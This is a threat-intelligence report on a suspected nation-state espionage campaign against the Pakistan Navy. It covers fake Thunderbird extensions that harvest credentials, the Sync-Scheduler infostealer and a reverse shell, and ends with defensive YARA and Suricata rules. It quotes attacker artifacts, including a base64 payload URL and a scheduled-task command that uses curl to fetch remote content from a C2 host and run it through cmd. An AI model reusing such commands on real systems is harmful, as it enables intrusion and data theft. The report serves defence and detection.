Suspected Nation-State Adversary Targets Pakistan Navy in Cyber Espionage Campaign

Summary

In early September, as part of the Arctic Wolf® Labs team’s continuous monitoring of cyber activities across the Indian subcontinent, we came across an interesting PDF lure which at a first glance appeared to be an internal IT communication for the Pakistan Navy.

As we pivoted off this artifact and followed its digital footprints, we came across a web of interlinking infrastructure, including artifacts of various filetypes that appeared to have an espionage theme and whose purpose was ultimately to deliver a stealthy infostealer to the targeted victims.

As we delved deeper into this campaign, we found that several of the Tactics, Techniques, and Procedures (TTPs) overlapped with those previously seen being used by two other prominent threat groups; however, we felt there was not enough evidence to warrant an attribution at this time.

In this blog, we’ll examine the full attack chain of this unknown threat actor, and provide actionable recommendations for remediation.

Technical Analysis

The initial lure in this campaign was a PDF document that was designed to look like an internal Pakistan Navy IT memo containing instructions on the integration of Axigen Thunderbird for secure email communications. This lure document contains an embedded URL used to obtain the required files, with targeted users being directed to download and install them.

At a first glance, the download link appears to conform to that of a legitimate Pakistan Navy URL, with the use of a secure protocol and “paknavy” domain name.

Figure 1: Pakistan Navy (fake) initial lure document.

However, in this case, the threat actor is using a malicious search engine optimization (SEO) poisoning technique known as typosquatting, since legitimate Pakistan Navy URLs conform to a paknavy.gov.pk pattern.

Table 1: Typosquatted “Paknavy” URL.

Upon inspection of the fake URL’s page located at hxxps://paknavy[.]rf[.]gd, we found it contained code designed to verify that the target environment has JavaScript enabled before the user interacts with the malicious Thunderbird extension packaged within the zip file (Axigen_Thunderbird.zip).

Table 2: Paknavy[.]rf[.]gd: JavaScript enabled on victim environment check.

At this stage it is safe to assume that the threat actor very likely had prior knowledge of the Pakistan Navy’s use of Axigen mail servers along with Thunderbird as their email client.

As the next stage of the attack, the threat actor meticulously crafted a custom Axigen user manual for the installation of a malicious Thunderbird extension, specifically tailored for this campaign. This high level of dedication plus the time and resources the group put into crafting such a detailed document indicates a highly targeted modus operandi.

Figure 2: Fake user manual for a malicious Thunderbird extension.

Once an unwitting user follows the fake instruction manual and installs the malicious extension in their Thunderbird email client, the client displays the title: “Mail Files Downloader.”

The extension then displays a login form designed specifically for @paknavy.gov.pk email addresses, misleading the victim into believing that upon entering their credentials they will be able to access and download their emails.

Figure 3: “Mail Files Downloader” extension installed in Thunderbird.

Once the user enters their legitimate credentials and submits them via the fake login form, they are sent in the body of a HTTP POST request to hxxps://updateschedulers[.]com/receive_credentials[.]php.

If the server response includes “Credentials Received,” it triggers a downloadFile() function which in turn calls the following code:

downloadFile(atob("aHR0cHM6Ly91cGRhdGVzY2hlZHVsZXJzLmNvbS9maWxlX2Rvd25sb2FkLnBocD9sZj0=")+ms);.

Table 3: Successful POST returned code.

The embedded base64 string decodes to hxxps://updateschedulers[.]com/file_download[.]php?lf, where “ms” in Table 3 (above) is a variable representing the device’s user agent string. The getS() function is utilized to gather the user agent information, which is then used to identify the victim’s operating system (OS) by returning a corresponding abbreviation for whichever one is detected, which is then stored in the variable “ms.”

  function getS() {
    const userAgent = navigator.userAgent;
    if (/windows phone/i.test(userAgent)) {return "WP";}
    if (/windows/i.test(userAgent)) {return "WIN";}
    if (/macintosh|mac os x/i.test(userAgent)) {return "Mac";}
    if (/android/i.test(userAgent)) {return "And";}
    if (/linux/i.test(userAgent)) {return "LIN";}
    if (/iphone|ipad|ipod/i.test(userAgent)) {return "iOS";}
    return "Unknown";}
  const ms = getS()

Table 4: OS identification.

Depending on which OS is identified on the victim’s device, the threat actor’s command-and-control (C2) server will then respond by returning a correlating zip file titled Mail_Files.zip.

At the time of our investigation, while each operating system returned a corresponding zip file, only the Windows OS returned an actual payload intended for further exploitation. When queried from other OSes, a zip was returned that is best described as a dummy folder containing benign documents or files.

We have a couple of theories about this. It may be because the threat actor was only interested in targeting Windows devices, or that they intend to target other OSes in future. Alternatively, they may be just using this process as an OS check to verify their payload is sent to the correct machines for detonation.

Execution Chain

Figure 4: Execution chain diagram. (Click to enlarge.)

Final Payload: Sync-Scheduler

The final payload is a very stealthy and capable infostealer dubbed Sync-Scheduler by researchers at Cyfirma. It was first documented in March 2024, although we have found earlier samples that appear to be from at least mid-2023 based on their compilation timestamps.

The sample used in this particular campaign appears to be a newer version of the one previously documented by Cyfirma researchers earlier this year.

Authored in C++ and containing robust evasion and anti-analysis capabilities, Sync-Schedler’s core functionality appears to have remained largely unchanged since previous iterations. Upon execution, the malware gathers some basic machine metadata such as the universally unique identifier (UUID), via the following Windows management instrumentation (WMI) query. It filters by UUID, which corresponds to the following regkey: HKLM\\SYSTEM\\HardwareConfig\\<UUID>.

Figure 5: UUID WMI query.

This information is then sent (with a unique check-in string in the form: “uD=<UUID>, &ifangtaiyang=”) to the threat actor’s C2 server, at packageupdates[.]net/r3diRecT/redirector/proxy[.]php, via a HTTP POST request.

Figure 6: Initial C2 checkin at packageupdates[.]net.

This C2 server is different from the one used in previously documented campaigns of Sync-Scheduler. Most notably, any attempts to manually navigate to it, bizarrely results in the user being redirected to a Chinese Government website, which is the same one that was seen with the older version of the infostealer.

Figure 7: Attempts to manually navigate to the C2 redirects the user to the legitimate site www.gov.cn.

One of the malware’s most potent evasion and anti-analysis techniques is the use of blocks of encrypted data that are only decrypted dynamically during runtime and whose purpose is to create persistence.

This is attained via the creation of several scheduled tasks, each one deceptively named after common legitimate windows software, including OneDrive, Skype, and WindowsUpdate. This is an attempt by the threat actor to make these tasks appear non-threatening. The tasks are configured to run one after the other, staggered at roughly three-hour intervals.

Figure 8: Scheduled Task command line arguments.

Figure 9: Scheduled task creation.

The main purpose of Sync-Scheduler is to look for documents of specific common types, gather them in the same location and get them ready for exfiltration.

Buried deep within its code is a list of hardcoded strings corresponding with each document file-type. It uses this list to compare and replace each file-type extension with its correlating ID tag in the list shown below.

Table 5: Document type and correlating ID tag.

Figure 10: Targeted file-type replacement strings.

After querying the victim host and finding a document that matches one of the targeted file-types, the extension is compared to those on its list. If it’s a match, it is replaced with the correlating hardcoded one and then copied to C:\\Users\\<user>\\AppData\\Roaming\\System.

The file paths are logged to a file called Registry.log located in a newly created directory at C:\\Users\\<users>\\AppData\\Roaming\\FileRegistry\\.

The contents of the file are then encrypted with the Tiny Encryption Algorithm (TEA) prior to exfiltration to packageupdates[.]net.

An Intriguing Relation

Interestingly, some pivoting revealed another file that contained an almost identical scheduled task creation command structure to the one mentioned above. The only difference between the two was the use of “daily” as opposed to “once.”

This file, named KBUpdate.exe, had a compilation timestamp of 2024-06-03 09:32:31 and was found embedded inside a table in the database of the Microsoft Access file Tax_List1.accde. This highly unusual execution chain ensured it slipped well under the radar of most vendors when uploaded to VirusTotal (VT) in early August.

It also contained a program database (PDB) path which was similar in structure and seemed to match the one seen in our Sync-Scheduler sample.

Figure 11: PDB comparison between the two files.

Upon analysis, we found significant overlaps in code base between KBUpdate.exe and the latest version of Sync-Scheduler (Employee-Information-Pak-Navy.exe) documented in this report. However, its core functionality and purpose are inherently different.

Figure 12: Code overlaps between Sync-Scheduler and Black-Shell.

The main difference that caught our attention was that KBUpdate.exe, which we are referring to as Black-Shell due to the codename in its PDB path, is best described as a malware reverse shell. In essence, this is a lightweight backdoor designed to facilitate communications between two hosts, or in this case, between a compromised victim device and an attacker-controlled machine.

Unlike Sync-Scheduler’s Employee-Information-Pak-Navy.exe, which shares some of its codebase, Black-Shell has no capabilities to find, encrypt and then exfiltrate files or anything else outside its reverse-shell functionality.

The Plot Thickens

In late August 2024, another Microsoft Access file that had characteristics resembling Tax_List.accde was uploaded to VT from a user based in Pakistan. This file executes a scheduled task command consistent with tactics associated with the advanced persistent threat group APT Bitter, a suspected South Asian cyber espionage threat group that has been active since at least 2013. Additionally, the malicious C2 mxmediasolutions[.]com had been linked to this same group as early as July 2024.

cmd.exe /c schtasks /create /tn EdgeUpdateTaskMachine /f /sc minute /mo 14 /tr "conhost.exe --headless cmd /c curl -o C:\\Users\\public\\documents\\pic.jpg mxmediasolutions[.]com/addc.php?mg=%computername%_%username% & more C:\\Users\\public\\documents\\pic.jpg | cmd"

Table 6: Microsoft Access file scheduled task command linked to APT Bitter.

Additional Finds

Retroactive hunts for similar malicious XPI files led to the discovery of four extension files targeting the Pakistan Navy, all of which masqueraded as an email-signing extension called “PN Mailbox E-signer,” which also targeted the Thunderbird email client. Notably, the “E-signer” extension files pre-date the Axigen_Thunderbird.xpi extension, with the last modifications recorded in late May 2024. All four files were distributed within a short period in early June 2024.

Figure 13: Additional Thunderbird extension files masquerading as “PN Mailbox E-signer” targeting the Pakistan Navy.

The “E-signer” extensions contained obfuscated JavaScript, and, once installed in Thunderbird, would prompt the user to input their password with the message: “Regular E-Signing will keep new mails updated.” Interestingly, the prompt did not request a username or email, but instead used a hardcoded Pakistan Navy email address embedded in the JavaScript in Base64 format.

These files did not deliver any additional payload. The primary purpose of the JavaScript across all extensions was to capture the intended victim’s password and send it via a POST request to hxxps://extension[.]webmailmigration[.]com/ajaxtension[.]php. The use of the Pakistan Navy logo, the specific naming of the extensions, and — most notably — the hardcoded email address, indicate that this group of files was highly targeted.

Figure 14: Activity timeline of this campaign. (Click to enlarge.)

Some additional and older but nonetheless interesting artifacts were found when we were tracing back through the network infrastructure of the C2 servers updateschedulers[.]com and packageupdates[.]net.

We observed that in and around March of this year, a series of files were uploaded to VirusTotal that formed part of an execution chain that was not too dissimilar from the one documented in this report. This chain, which started with a Pakistan-targeted lure, is notable because it is the first time that both updateschedulers[.]com and packageupdates[.]net were seen by Arctic Wolf® being leveraged as part of a malicious campaign, and we believe it’s highly likely they were being used by the same threat actor.

Another interesting thing we found is that one of the files in this particular execution chain was tagged by various sources online as being a WhisperGate sample, which was a highly destructive malware wiper deployed against Ukrainian targets in January 2022.

Upon further analysis, we can confirm this suspicion is false, and that the sample in question is in fact a simple downloader that leverages curl to retrieve the next file in the execution chain, which we identified as a version of Sync-Scheduler with an embedded PDB of C:\\Users\\user\\Documents\\Project-M\\Visual Studio\\MW-NEW_TELEMETRY-ExE\\x64\\Release\\MW-NEW_TELEMETRY-ExE.pdb.

Figure 15: ‘Benevolent Fund and Group Insurance’ lure document.

Network

Figure 16: Graph of network infrastructure. (Click to enlarge.)

Table 7: IP address details corresponding with this campaign.

Table 8: Malicious domain details.

Targets

Figure 17: Victim geolocation for this campaign.  

Attribution

With attribution, one often finds that when you dig deeper, quite often a different picture emerges from the original assumption. This makes providing an accurate attribution a complex endeavor. Attackers often use techniques to mask their location and identity as well as employing “false flags” to mimic the TTPs of other known groups in order to muddy the waters and mislead investigators.

Where attribution is concerned for this latest campaign observed by Arctic Wolf, here’s what we know to date: the targeted victim, along with the TTPs observed and documented in this attack, point to a threat actor that possesses a relatively high degree of sophistication, capabilities and knowledge, with a likely motive of conducting espionage.

In addition, several of the TTPs we observed have distinct overlaps with a previously documented campaign conducted against Chinese-based entities by the group known as SideWinder — an Indian state-aligned threat actor that has conducted espionage operations against Pakistani Government entities in the past.

On the other hand, Arctic Wolf observed many elements in this campaign that appear to align with prior operations attributed to APT Bitter — a South Asian threat group whose primary focus has been on conducting espionage operations against organizations and entities in South Asia, including China, Pakistan and Bangladesh, amongst others. Although APT Bitter has also been previously suspected to be Indian state-aligned, this has never been definitively confirmed or proven. Observed elements apparently shared between the groups included overlapping network infrastructure, specific URL formatting, access vectors, and other TTPs.

Despite these overlaps and indications for both groups, at the time of writing this we do not feel there is a strong enough body of evidence to warrant a positive attribution to either of these groups, and will therefore consider this campaign as being perpetuated by an unknown group or nexus. However, as we continue our monitoring of threat actors in this particular geographic region, we will revisit our findings if more supporting evidence surfaces.

Conclusions

This investigation by the Arctic Wolf Labs team uncovered a sophisticated targeted attack perpetuated against the Pakistan Navy up until at least September 2024. Pivoting off the indicators of compromise (IOCs) revealed links to earlier campaigns going back as far as mid 2023, and highlights the ever-increasing complexity and persistence of modern cyberthreats targeting the Government and Defense sectors.

By following a strategic and highly considered approach, the threat actor employed advanced techniques, reconnaissance, and stealthy tooling to harvest credentials and exfiltrate sensitive information from its targets, which strongly indicates this unknown group’s probable interest in espionage and maritime intelligence.

Mitigation Recommendations

Conduct Regular User Awareness Training

The building, conducting and regular updating of an internal user awareness training program is one of the most cost-effective means of protecting your organization against cyber risks of all types. By continuously educating personnel and keeping them abreast of the latest developments in cyber threats, organizations of all sizes can build an excellent first line of defense to counter cyberattacks. Regular training empowers team members with the confidence and knowledge to protect both themselves and the organization they represent.

Phishing Protection

Protection of the outermost layers of a business is essential when it comes to shielding your organization from phishing and social engineering attacks, as threat actors often rely on humans being the weakest links of the security chain. Therefore, a modern email security solution (ESS) or web filtering solution combined with user awareness training can go a long way in mitigating against this attack vector.

Endpoint Protection Solutions

Deploying an advanced AI-powered endpoint protection platform (EPP) such as Arctic Wolf® Aurora™ Endpoint Security can help protect against the threats described in this report.

Restrict JavaScript in the Browser

Through thorough and strict group polices, IT admins can preconfigure browser settings on managed devices to disable JavaScript on sensitive machines and networks. This goes a long way in protecting against execution chains which rely on JavaScript as part of their attack, such as the one used in the campaign described here.

Cyber Threat Intelligence

Having access to accurate and up-to-date cyber threat intelligence (CTI) is a critical component in building and maintaining an effective cyber defensive posture. This will enable an organization to proactively identify and mitigate potential threats before they escalate into fully blown cyberattacks. Threat intelligence delivers actionable insights into the latest TTPs being utilized by threat actors, enabling defenders to anticipate and build countermeasures against the newest attack methods.

Indicators of Compromise (IOCs)

File

Network

Other

Countermeasures

Yara Rule

rule targeted_SyncScheduler_Malware {
    meta:
        description = "Rule detecting Sync-Scheduler malware used for extracting documents"
        author = "The Arctic Wolf Labs team"
        distribution = "TLP:AMBER+STRICT"
        date = "2024-10-21"
        version = "1.0"         

    strings:
        $a1 = "docx" ascii wide
        $a2 = "xlsx" ascii wide
        $a3 = "pptx" ascii wide
        $a4 = "POST"
        $a5 = "C:/Users/All Users" ascii wide
        $a6 = "C:/Users/Default" ascii wide
        $a7 = "C:/Users/Public" ascii wide
        $a8 = "ReadFile" ascii
        $a9 = "CreateMutexA" ascii
        $a10 = "GetConsoleWindow" ascii
        $b1 = "Content-Type: application/x-www-form-urlencoded"
        $b2 = "SELECT * FROM Win32_ComputerSystemProduct"

    condition:
       uint16 ( 0 ) == 0x5a4d and all of ($a*) and 1 of ($b*)
}

Suricata Rule

alert http $HOME_NET any -> $EXTERNAL_NET any ( msg:"MALWARE: Sync-Scheduler Document Stealer POST request"; content:"POST"; http_method; flow:to_server,established; content:"proxy|2e|php"; nocase; http_uri; content:"uD="; nocase; http_client_body; content:"xifangtaiyang="; nocase; http_client_body; priority:1; sid:2051843; rev:1; )

MITRE ATT&CK® Mapping

About Arctic Wolf Labs

Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence and machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings.

Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.